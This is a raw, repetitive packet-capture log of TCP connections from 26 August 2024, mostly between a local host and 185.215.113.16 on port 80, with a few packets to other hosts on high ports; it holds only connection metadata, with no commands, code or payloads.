Aug 26, 2024 23:29:23.179120064 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.179126978 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.179131985 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.179152966 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.179173946 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.179184914 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.179195881 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.179203033 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.179208040 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.179219007 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.179225922 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.179229021 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.179240942 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.179255962 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.179267883 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.179302931 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.182231903 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.182244062 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.182255030 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.182279110 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.182374954 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.182375908 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.182387114 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.182396889 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.182409048 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.182425022 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.182440996 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.182451010 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.182452917 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.182462931 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.182477951 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.182480097 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.182480097 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.182507992 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.182596922 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.182636023 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.182646990 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.182658911 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.182670116 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.182681084 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.182708025 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.182755947 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.182766914 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.182777882 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.182782888 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.182812929 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.183063030 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.183451891 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.183523893 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.183533907 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.183545113 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.183583021 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.183583021 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.183615923 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.183628082 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.183638096 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.183650017 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.183660030 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.183680058 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.183754921 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.184705019 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.184715986 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.184726954 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.184792042 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.184792042 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.184792995 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.184804916 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.184819937 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.184830904 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.184859037 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.184919119 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.232158899 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:23.259923935 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.259943008 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.259955883 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.259962082 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.259968042 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.259974003 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.259982109 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.260030985 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.260042906 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.260054111 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.260062933 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.260066032 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.260080099 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.260129929 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.260129929 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.260144949 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.260155916 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.260168076 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.260180950 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.260194063 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.260205030 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.260211945 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.260216951 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.260245085 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.260320902 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.260353088 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.260401964 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.260413885 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.260432005 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.260442972 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.260454893 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.260485888 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.260485888 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.260502100 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.260520935 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.260529995 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.260534048 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.260545969 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.260552883 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.260564089 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.260570049 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.260579109 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.260601044 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.260672092 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.260684967 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.260695934 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.260715961 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.260746956 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.260746956 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.268394947 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.268405914 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.268418074 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.268436909 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.268449068 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.268459082 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.268460035 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.268479109 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.268503904 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.268516064 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.268522978 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.268522978 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.268543005 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.268548012 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.268558979 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.268570900 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.268575907 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.268610954 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.268621922 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.268626928 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.268626928 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.268640041 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.268651009 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.268671989 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.268712997 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.269428015 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.269439936 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.269452095 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.269486904 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.269499063 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.269510984 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.269525051 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.269530058 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.269591093 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.269603968 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.269615889 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.269619942 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.269627094 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.269642115 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.269644976 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.269658089 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.269669056 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.269675016 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.269675016 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.269689083 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.269701004 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.269711971 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.269714117 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.269738913 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.269742012 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.269752026 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.269763947 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.269767046 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.269790888 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.269862890 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.269866943 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.269963980 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.269974947 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.269985914 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.270059109 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.270071983 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.270083904 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.270088911 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.270097971 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.270138025 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.270138025 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.270179033 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.270245075 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.270257950 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.270271063 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.270282984 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.270311117 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.270347118 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.272762060 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.272814035 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.272825003 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.272846937 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.272907019 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.272922993 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.272924900 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.272938013 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.272948980 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.272960901 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.272965908 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.272974014 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.272974014 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.272988081 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.272999048 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.273003101 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.273015976 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.273046017 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.273085117 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.273164988 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.273176908 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.273190022 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.273200989 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.273224115 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.273268938 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.273276091 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.273333073 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.273387909 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.273399115 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.273453951 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.273453951 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.273530960 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.273567915 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.273597956 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.273648977 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.273726940 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.273737907 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.273792982 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.273792982 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.273799896 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.273818970 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.273854017 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.273910046 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.273941040 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.273951054 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.273974895 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.274061918 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.274122000 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.274166107 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.274199963 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.274460077 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.275989056 CEST	49728	29257	192.168.2.7	95.179.163.21
Aug 26, 2024 23:29:23.277251959 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.277298927 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.277311087 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.277329922 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.277355909 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.277410984 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.277424097 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.277437925 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.277451038 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.277467966 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.277550936 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.278969049 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.279047012 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.279059887 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.279073000 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.279078007 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.279102087 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.279189110 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.279200077 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.279212952 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.279215097 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.279242039 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.279242039 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.279381037 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.284560919 CEST	29257	49728	95.179.163.21	192.168.2.7
Aug 26, 2024 23:29:23.290585041 CEST	49733	80	192.168.2.7	185.215.113.17
Aug 26, 2024 23:29:23.295840979 CEST	80	49733	185.215.113.17	192.168.2.7
Aug 26, 2024 23:29:23.329566002 CEST	49729	45580	192.168.2.7	65.21.18.51
Aug 26, 2024 23:29:23.335207939 CEST	45580	49729	65.21.18.51	192.168.2.7
Aug 26, 2024 23:29:23.350723982 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.350742102 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.350753069 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.350769997 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.350781918 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.350785971 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.350794077 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.350805998 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.350816965 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.350827932 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.350831985 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.350838900 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.350847960 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.350850105 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.350867033 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.350867987 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.350881100 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.350892067 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.350895882 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.350903988 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.350913048 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.350914955 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.350925922 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.350929976 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.350938082 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.350950003 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.350965977 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.350996017 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.351006985 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.351016998 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.351027966 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.351075888 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.351075888 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.351109028 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.351119041 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.351130009 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.351139069 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.351150990 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.351152897 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.351162910 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.351172924 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.351186037 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.351195097 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.351196051 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.351236105 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.351236105 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.351243019 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.351252079 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.351265907 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.351277113 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.351313114 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.351368904 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.351383924 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.351387978 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.351396084 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.351404905 CEST	49734	80	192.168.2.7	185.215.113.16
Aug 26, 2024 23:29:23.351408005 CEST	80	49734	185.215.113.16	192.168.2.7
Aug 26, 2024 23:29:23.351430893 CEST	49734	80	192.168.2.7	185.215.113.16
